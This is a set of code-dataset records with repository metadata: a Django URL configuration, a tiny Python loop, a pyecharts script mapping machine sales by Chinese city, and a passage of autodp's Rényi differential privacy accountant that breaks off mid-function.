text:about" href="https://github.com/about">About</a></li> </ul> </div> <div class="d-flex flex-justify-center pb-6"> <span class="f6 color-text-tertiary"></span> </div> </div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 
15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> <span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span> <span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. 
<a href="">Reload</a> to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-text-primary hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details> </template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div> </div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" 
data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </clipboard-copy> </div> </template> <style> .user-mention[href$="/Bomzz06"] { color: var(--color-user-mention-fg); background-color: var(--color-user-mention-bg); border-radius: 2px; margin-left: -2px; margin-right: -2px; padding: 0 2px; } </style> </body> </html>
false
true
f705ba86509d02480a6aad1d5e160ac7369c37b3
748
py
Python
myblog/urls.py
kubruslihiga/djangotutorial
c13c5267761a4aaa422271b4220d8e724fccd37a
[ "Apache-2.0" ]
null
null
null
myblog/urls.py
kubruslihiga/djangotutorial
c13c5267761a4aaa422271b4220d8e724fccd37a
[ "Apache-2.0" ]
null
null
null
myblog/urls.py
kubruslihiga/djangotutorial
c13c5267761a4aaa422271b4220d8e724fccd37a
[ "Apache-2.0" ]
null
null
null
"""myblog URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path urlpatterns = [ path('admin/', admin.site.urls), ]
34
77
0.708556
from django.contrib import admin from django.urls import path urlpatterns = [ path('admin/', admin.site.urls), ]
true
true
f705bbab14c4d76328f030a10cda3c1c25aff596
63
py
Python
test.sh.py
MarcAntoineAlex/query-selector-1
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
[ "Apache-2.0" ]
null
null
null
test.sh.py
MarcAntoineAlex/query-selector-1
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
[ "Apache-2.0" ]
null
null
null
test.sh.py
MarcAntoineAlex/query-selector-1
f41938e5b4661c7df7d02a2a0ef841921d14d4f6
[ "Apache-2.0" ]
null
null
null
a = [0, 1, 2] b = [0, 1] for a, b in zip(a, b): print(a, b)
15.75
22
0.412698
a = [0, 1, 2] b = [0, 1] for a, b in zip(a, b): print(a, b)
true
true
f705bbcb1c4c4102c9bcfce19fd7880e846a49e3
3,851
py
Python
python业务代码/地图散点可视化/2/plot_city_machine.py
RobinYaoWenbin/Python-CommonCode
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
[ "MIT" ]
12
2020-09-28T03:25:03.000Z
2022-03-20T07:44:09.000Z
python业务代码/地图散点可视化/2/plot_city_machine.py
RobinYaoWenbin/Python-CommonCode
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
[ "MIT" ]
null
null
null
python业务代码/地图散点可视化/2/plot_city_machine.py
RobinYaoWenbin/Python-CommonCode
1ee714541f2fd9c8b96d018d3d4eb94f4edc812a
[ "MIT" ]
21
2020-03-19T00:44:35.000Z
2022-01-30T03:46:18.000Z
# -*- coding: utf-8 -*- """ Created on Wed Aug 7 09:36:45 2019 @author: MyPC """ import pandas as pd import matplotlib.pyplot as plt import matplotlib import math import pymssql import numpy as np import copy import re from sklearn import preprocessing from sklearn.linear_model import LinearRegression from pyecharts import Map, Geo , Timeline def get_data_signalmachine(): df = pd.read_excel('Data.xlsx' , sheet_name='example') # df.fillna(0 , inplace = True) # df.set_index('year' , inplace = True) df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True) df.rename(columns = {'行标签':'city'} , inplace = True) df.set_index('city' , inplace = True) df = df.T df.rename(columns = {'合计' : 'total'} , inplace = True) # print(df) return df def plot_map(df): # maptype='china' 只显示全国直辖市和省级 # 数据只能是省名和直辖市的名称 # province_distribution = {'青岛': 22, '龙口': 37.56, '河北': 21, '辽宁': 12, '江西': 6, '上海': 20, '安徽': 10, '江苏': 16, '湖南': 9, '浙江': 13, '海南': 2, '广东': 22, '湖北': 8, '黑龙江': 11, '澳门': 1, '陕西': 11, '四川': 7, '内蒙古': 3, '重庆': 3, '云南': 6, '贵州': 2, '吉林': 3, '山西': 12, '山东': 11, '福建': 4, '青海': 1, '舵主科技,质量保证': 1, '天津': 1, '其他': 1} # provice=list(province_distribution.keys()) # values=list(province_distribution.values()) years = list(df.index) geos = [] timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \ is_timeline_show = False ) for index in range(len(years)): cities = list(df.columns) cities.remove('total') values = list(df.loc[years[index] , :]) total_num = values[-1] del(values[-1]) # print(cities) # print(values) geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \ subtitle_text_size = 23 , subtitle_color="white", \ title_color="red", title_pos="center", width=1200, height=600, \ background_color='#404a59')) # type="effectScatter", is_random=True, effect_scale=5 使点具有发散性 geos[index].add("title level1", 
cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\ visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \ is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \ geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \ '济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , '文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \ '宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \ pieces=[ {"min":0.1, "max": 50 , "label": "0-50"}, {"min": 51, "max": 100 , "label": "51-100"}, {"min": 101, "max": 200 , "label": "101-200"}, {"min":201, "max": 500, "label": "201-500"}, {"min":500, "max": 2900, "label": ">500"}, ] ) geos[index].show_config() geos[index].render("xxxx售出数量.html") # 时间轴定义 timeline.add(geos[index],years[index] ) timeline.render('final_graph.html') def main(): df = get_data_signalmachine() # print(df) plot_map(df) if __name__ == "__main__": main()
47.54321
317
0.579849
import pandas as pd import matplotlib.pyplot as plt import matplotlib import math import pymssql import numpy as np import copy import re from sklearn import preprocessing from sklearn.linear_model import LinearRegression from pyecharts import Map, Geo , Timeline def get_data_signalmachine(): df = pd.read_excel('Data.xlsx' , sheet_name='example') df.drop(columns = ['NO' , '首次售出年份' , '总计'] , inplace = True) df.rename(columns = {'行标签':'city'} , inplace = True) df.set_index('city' , inplace = True) df = df.T df.rename(columns = {'合计' : 'total'} , inplace = True) return df def plot_map(df): years = list(df.index) geos = [] timeline = Timeline(width=1700,height=900,is_auto_play=True, timeline_bottom=-10,timeline_symbol_size=20,timeline_play_interval=400,timeline_left=20,timeline_right=100 , \ is_timeline_show = False ) for index in range(len(years)): cities = list(df.columns) cities.remove('total') values = list(df.loc[years[index] , :]) total_num = values[-1] del(values[-1]) geos.append(Geo( str(int(total_num)), title_top="10%" , title_text_size=50 , subtitle = years[index] +" , subtitle", \ subtitle_text_size = 23 , subtitle_color="white", \ title_color="red", title_pos="center", width=1200, height=600, \ background_color='#404a59')) geos[index].add("title level1", cities, values, type="effectScatter", maptype='china' , is_random=True, effect_scale=3, is_selected = True,is_toolbox_show = True ,is_more_utils =True,\ visual_text_color="#fff", symbol_size=10, is_label_show = True , legend_orient = 'left' ,is_legend_show = False, legend_top = 'bottom' , label_formatter = '{b}' , \ is_visualmap=True, is_roam=True , label_text_color="#00FF00" , is_piecewise=True, label_text_size = 7,visual_range=[1, 300] , \ geo_cities_coords = {'赣江': [115.934192 , 28.826235] , '红河州' : [103.381549,23.369996] , '蒙自' : [103.371546,23.40208] , '海安' : [120.469259,32.544553] , \ '济阳' : [117.023094,36.965519] , '库车' : [82.970183,41.733785] , '文山-砚山' : [104.334442,23.621612] , 
'文安':[116.455985,38.891083] , '罗平':[104.309188,24.890519] , \ '宣城' : [118.762662,30.957007] , '古田' : [118.747401,26.596702] , '泗阳':[118.699691,33.723524] , } , \ pieces=[ {"min":0.1, "max": 50 , "label": "0-50"}, {"min": 51, "max": 100 , "label": "51-100"}, {"min": 101, "max": 200 , "label": "101-200"}, {"min":201, "max": 500, "label": "201-500"}, {"min":500, "max": 2900, "label": ">500"}, ] ) geos[index].show_config() geos[index].render("xxxx售出数量.html") timeline.add(geos[index],years[index] ) timeline.render('final_graph.html') def main(): df = get_data_signalmachine() plot_map(df) if __name__ == "__main__": main()
true
true
f705bf3cfd5f5c6cac8ba32067f41aadcc0e38d6
34,521
py
Python
autodp/rdp_acct.py
jeremy43/autodp-1
0a3626f6e1baaefb46715396998d1e8029a659bb
[ "Apache-2.0" ]
2
2020-06-11T02:48:41.000Z
2020-11-17T07:04:01.000Z
autodp/rdp_acct.py
jeremy43/autodp-1
0a3626f6e1baaefb46715396998d1e8029a659bb
[ "Apache-2.0" ]
null
null
null
autodp/rdp_acct.py
jeremy43/autodp-1
0a3626f6e1baaefb46715396998d1e8029a659bb
[ "Apache-2.0" ]
null
null
null
""" This file contains the implementation of the main class object: anaRDPacct --- an analytical moment accountant that keeps track the effects of a hetereogeneous sequence of randomized algorithms using the RDP technique. In particular it supports amplification of RDP by subsampling without replacement and the amplification of RDP by poisson sampling, but unfortunately not (yet) together. """ import numpy as np from scipy.optimize import minimize_scalar import sys sys.path.append('..') import autodp from autodp import utils, rdp_bank from autodp.privacy_calibrator import subsample_epsdelta import scipy import math def general_upperbound(func, mm, prob): """ :param func: :param mm: alpha in RDP :param prob: sample probability :return: the upperbound in theorem 1 in 2019 ICML,could be applied for general case(including poisson distribution) k_approx = 100 k approximation is applied here """ def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1 or mm == 0: return 0 cur_k = np.minimum(50, mm - 1) # choose small k-approx for general upperbound (here is 50) in case of scipy-accuracy log_term_1 = mm * np.log(1 - prob) #logBin = utils.get_binom_coeffs(mm) log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm)) neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in range(3, cur_k + 1)] neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log( 1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1] neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob) neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm) pos_term = utils.stable_logsumexp([log_term_1, log_term_2]) neg_term_3.append(neg_term_4) neg_term_3.append(neg_term_5) neg_term_3.append(neg_term_6) neg_term = utils.stable_logsumexp(neg_term_3) bound = 
utils.stable_log_diff_exp(pos_term, neg_term)[1] return bound def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local): # evaulate the fast CGF bound for the subsampled mechanism # func evaluates the RDP of the base mechanism # mm is alpha. NOT lambda. return np.inf if np.isinf(func(mm)): return np.inf if mm == 1: return 0 secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1) + np.minimum(func(2), np.log(4)), np.log(2) + func(2)), np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1] + 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1] ) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2) if mm == 2: return utils.stable_logsumexp([0, secondterm]) # approximate the remaining terms using a geometric series logratio1 = np.log(prob) + np.log(mm) + func(mm) logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1) logratio = np.minimum(logratio1, logratio2) if logratio1 > logratio2: coeff = 1 else: coeff = 2 if mm == 3: return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio]) # Calculate the sum of the geometric series starting from the third term. This is a total of mm-2 terms. 
if logratio < 0: geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \ + np.log(1 - np.exp((mm - 2) * logratio)) elif logratio > 0: geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1) else: geometric_series_bound = np.log(coeff) + np.log(mm - 2) # we will approximate using (1+h)^mm logh1 = np.log(prob) + func(mm - 1) logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1) binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1) binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2) tmpsign, binomial_series_bound1 \ = utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2) + utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm) + np.log(mm - 1) - np.log(2)])) tmpsign, binomial_series_bound2 \ = utils.stable_sum_signed(True, binomial_series_bound2, False, utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm) + np.log(mm - 1) - np.log(2)])) remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2]) return utils.stable_logsumexp([0, secondterm, remainder]) def fast_poission_subsampled_cgf_upperbound(func, mm, prob): # evaulate the fast CGF bound for the subsampled mechanism # func evaluates the RDP of the base mechanism # mm is alpha. NOT lambda. 
if np.isinf(func(mm)): return np.inf if mm == 1: return 0 # Bound #1: log [ (1-\gamma + \gamma e^{func(mm)})^mm ] bound1 = mm * utils.stable_logsumexp_two(np.log(1-prob), np.log(prob) + func(mm)) # Bound #2: log [ (1-gamma)^alpha E [ 1 + gamma/(1-gamma) E[p/q]]^mm ] # log[ (1-gamma)^\alpha { 1 + alpha gamma / (1-gamma) + gamma^2 /(1-gamma)^2 * alpha(alpha-1) /2 e^eps(2)) # + alpha \choose 3 * gamma^3 / (1-gamma)^3 / e^(-2 eps(alpha)) * (1 + gamma /(1-gamma) e^{eps(alpha)}) ^ (alpha - 3) } # ] if mm >= 3: bound2 = utils.stable_logsumexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob), (mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2), np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob) + (mm-3)*np.log(1-prob) + 2 * func(mm) + (mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))]) else: bound2 = bound1 #print('www={} func={} mm={}'.format(np.exp(func(mm))-1),func, mm) #print('bound1 ={} bound2 ={}'.format(bound1,bound2)) return np.minimum(bound1,bound2) def fast_k_subsample_upperbound(func, mm, prob, k): """ :param func: :param mm: :param prob: sample probability :param k: approximate term :return: k-term approximate upper bound in therorem 11 in ICML-19 """ def cgf(x): return (x - 1) * func(x) if np.isinf(func(mm)): return np.inf if mm == 1: return 0 #logBin = utils.get_binom_coeffs(mm) cur_k = np.minimum(k, mm - 1) if (2 * cur_k) >= mm: exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1) exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in range(2, mm + 1)] exact_term_2.append(exact_term_1) bound = utils.stable_logsumexp(exact_term_2) return bound s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k)) new_log_term_1 = np.log(1 - prob) * mm + mag1 new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm - cur_k)) 
new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in range(2, cur_k + 1)] if len(new_log_term_3) > 0: new_log_term_3 = utils.stable_logsumexp(new_log_term_3) else: return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2) new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in range(mm - cur_k + 1, mm + 1)] new_log_term_4.append(new_log_term_1) new_log_term_4.append(new_log_term_2) new_log_term_4 = utils.stable_logsumexp(new_log_term_4) s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3) new_bound = new_log_term_5 return new_bound class anaRDPacct: """A class that keeps track of the analytical expression of the RDP --- 1/(alpha-1)*CGF of the privacy loss R.V.""" def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False): # m_max indicates the number that we calculate binomial coefficients exactly up to. # beyond that we use Stirling approximation. # ------ Class Attributes ----------- self.m = m # default number of binomial coefficients to precompute self.m_max = m_max # An upper bound of the quadratic dependence self.m_lin_max = m_lin_max # An upper bound of the linear dependence. self.verbose = verbose self.approx = approx self.lambs = np.linspace(1, self.m, self.m).astype(int) # Corresponds to \alpha = 2,3,4,5,.... for RDP self.alphas = np.linspace(1, self.m, self.m).astype(int) self.RDPs_int = np.zeros_like(self.alphas, float) self.n=0 self.RDPs = [] # analytical CGFs self.coeffs = [] self.RDP_inf = .0 # This is effectively for pure DP. self.logBinomC = utils.get_binom_coeffs(self.m + 1) # The logBinomC is only needed for subsampling mechanisms. 
self.idxhash = {} # save the index of previously used algorithms self.cache = {} # dictionary to save results from previously seen algorithms self.deltas_cache = {} # dictionary to save results of all discrete derivative path self.evalRDP = lambda x: 0 self.flag = True # a flag indicating whether evalCGF is out of date self.flag_subsample = False # a flag to indicate whether we need to expand the logBinomC. self.tol = tol # ---------- Methods ------------ def build_zeroth_oracle(self): self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)]) def plot_rdp(self): if not self.flag: self.build_zeroth_oracle() self.flag = True import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') x = range(0,self.m,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.show() def plot_cgf_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.plot(self.alphas, self.RDPs_int) plt.xlabel(r'$\lambda$') plt.ylabel('CGF') plt.show() def plot_rdp_int(self): import matplotlib.pyplot as plt plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k') plt.loglog(self.alphas, self.RDPs_int) if not self.flag: self.build_zeroth_oracle() self.flag = True x = range(1,self.m_lin_max,1) y = [self.evalRDP(item) for item in x] plt.loglog(x, y) plt.xlabel(r'$\alpha$') plt.ylabel(r'RDP $\epsilon$') plt.show() def get_rdp(self,alphas): # alphas is a numpy array or a list of numbers # we will return a numpy array of the corresponding RDP if not self.flag: self.build_zeroth_oracle() self.flag = True alphas = np.array(alphas) assert(np.all(alphas >= 1)) rdp_list = [] for alpha in alphas: rdp_list.append(self.evalRDP(alpha)) return np.array(rdp_list) def get_eps(self, delta): # minimize over \lambda if not self.flag: self.build_zeroth_oracle() self.flag = True if delta<0 or delta > 1: print("Error! 
delta is a probability and must be between 0 and 1") if delta == 0: return self.RDP_inf else: def fun(x): # the input the RDP's \alpha if x <= 1: return np.inf else: return np.log(1 / delta)/(x-1) + self.evalRDP(x) def fun_int(i): # the input is RDP's \alpha in integer if i <= 1 | i >= len(self.RDPs_int): return np.inf else: return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1] # When do we have computational constraints? # Only when we have subsampled items. # First check if the forward difference is positive at self.m, or if it is infinite while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0): # If so, double m, expand logBimomC until the forward difference is positive if self.flag_subsample: # The following line is m^2 time. self.logBinomC = utils.get_binom_coeffs(self.m*2+1) # Update deltas_caches for key, val in self.deltas_cache.items(): if type(key) is tuple: func_tmp = key[0] else: func_tmp = key cgf = lambda x: x*func_tmp(x+1) deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2) self.deltas_cache[key] = [deltas, signs_deltas] new_alphas = range(self.m + 1, self.m * 2 + 1, 1) self.alphas = np.concatenate((self.alphas, np.array(new_alphas))) # array of integers self.m = self.m * 2 mm = np.max(self.alphas) rdp_int_new = np.zeros_like(self.alphas, float) for key,val in self.cache.items(): idx = self.idxhash[key] rdp = self.RDPs[idx] newarray = np.zeros_like(self.alphas, float) for j in range(2,mm+1,1): newarray[j-1] = rdp(1.0*j) newarray[0]=newarray[1] coeff = self.coeffs[idx] rdp_int_new += newarray * coeff self.cache[key] = newarray self.RDPs_int = rdp_int_new # # update the integer CGF and the cache for each function # rdp_int_new = np.zeros_like(self.RDPs_int) # for key,val in self.cache.items(): # idx = self.idxhash[key] # rdp = self.RDPs[idx] # newarray = np.zeros_like(self.RDPs_int) # for j in range(self.m): # newarray[j] = rdp(1.0*(j+self.m+1)) # # coeff = self.coeffs[idx] # rdp_int_new += 
newarray * coeff # self.cache[key] = np.concatenate((val, newarray)) # # # update the corresponding quantities # self.RDPs_int = np.concatenate((self.RDPs_int, rdp_int_new)) #self.m = self.m*2 bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1 if bestint == self.m-1: if self.verbose: print('Warning: Reach quadratic upper bound: m_max.') # In this case, we matches the maximum qudaratic upper bound # Fix it by calling O(1) upper bounds and do logarithmic search cur = fun(bestint) while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8: bestint = bestint*2 cur = fun(bestint) if bestint > self.m_lin_max and self.approx ==True: print('Warning: Reach linear upper bound: m_lin_max.') return cur results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2], options={'disp': False}) if results.success: return results.fun else: return None #return fun(bestint) if bestint == 0: if self.verbose: print('Warning: Smallest alpha = 1.') # find the best integer alpha. bestalpha = self.alphas[bestint] results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1], options={'disp':False}) # the while loop above ensures that bestint+2 is at most m, and also bestint is at least 0. if results.success: return results.fun else: # There are cases when certain \delta is not feasible. # For example, let p and q be uniform the privacy R.V. 
is either 0 or \infty and unless all \infty # events are taken cared of by \delta, \epsilon cannot be < \infty return -1 def compose_mechanism(self, func, coeff=1.0): self.flag = False if func in self.idxhash: self.coeffs[self.idxhash[func]] += coeff # also update the integer CGFs self.RDPs_int += self.cache[func] * coeff else: # book keeping self.idxhash[func] = self.n self.n += 1 self.coeffs.append(coeff) # update the analytical self.RDPs.append(func) # also update the integer results if func in self.cache: tmp = self.cache[func] else: tmp = np.zeros_like(self.RDPs_int, float) for i in range(self.m): tmp[i] = func(i+1) self.cache[func] = tmp # save in cache self.RDPs_int += tmp * coeff self.RDP_inf += func(np.inf) * coeff #795010 #imple 100 def compose_subsampled_mechanism(self, func, prob, coeff=1.0): # This function is for subsample without replacements. self.flag = False self.flag_subsample = True if (func, prob) in self.idxhash: idx = self.idxhash[(func, prob)] # update the coefficients of each function self.coeffs[idx] += coeff # also update the integer CGFs self.RDPs_int += self.cache[(func, prob)] * coeff else: def cgf(x): return x * func(x+1) # we need forward differences of thpe exp(cgf) # The following line is the numericall y stable way of implementing it. 
# The output is in polar form with logarithmic magnitude deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m) #deltas1, signs_deltas1 = get_forward_diffs_direct(func, self.m) #tmp = deltas-deltas1 self.deltas_cache[(func,prob)] = [deltas,signs_deltas] def subsample_func_int(x): # This function evaluates teh CGF at alpha = x, i.e., lamb = x- 1 deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)] if np.isinf(func(x)): return np.inf mm = int(x) fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local) fastupperbound2 = general_upperbound(func, mm, prob) if self.approx ==True: if fastupperbound2 <0: print('general rdp is negative',x) return fastupperbound2 if mm <= self.alphas[-1]: # compute the bound exactly. Requires book keeping of O(x^2) moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)), np.log(2) + cgf(j-1)), np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1] + 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob) +self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)] return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments)) elif mm <= self.m_lin_max: # compute the bound with stirling approximation. Everything is O(x) now. 
